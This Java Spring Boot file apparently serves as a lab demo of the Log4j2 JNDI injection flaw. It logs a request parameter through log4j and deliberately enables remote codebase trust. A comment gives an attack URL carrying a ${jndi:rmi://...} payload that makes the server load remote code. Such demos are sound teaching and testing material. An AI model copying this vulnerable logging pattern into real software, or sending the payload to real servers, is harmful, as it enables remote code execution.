package com.mayikt.service;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

/**
 * @author 余胜军
 * @ClassName MayiktService
 * @qq 644064779
 * @addres www.mayikt.com
 * 微信:yushengjun644
 */
@RestController
@SpringBootApplication
public class MayiktService {
    private static final Logger logger = LogManager.getLogger(MayiktService.class);

    /**
     * 攻击案例
     * http://127.0.0.1:8080/getMayikt?name=$%7Bjndi:rmi://127.0.0.1:1099/mayikt%7D
     * http://127.0.0.1:8080/getMayikt?name=$%7Bjndi:rmi://127.0.0.1:1099/mayikt%7D
     *
     * @param name
     * @return
     */
    @RequestMapping("/getMayikt")
    public String getMayikt(String name) {
        System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
        // name.replace("$","---");
        logger.info(name);
        return "name:" + name;
    }

    /**
     * 日志框架 log4j2、 logback没有任何
     * fast json 漏洞注入的bug 远程注入
     *
     * @param args
     */
    public static void main(String[] args) {
        SpringApplication.run(MayiktService.class);
    }
}
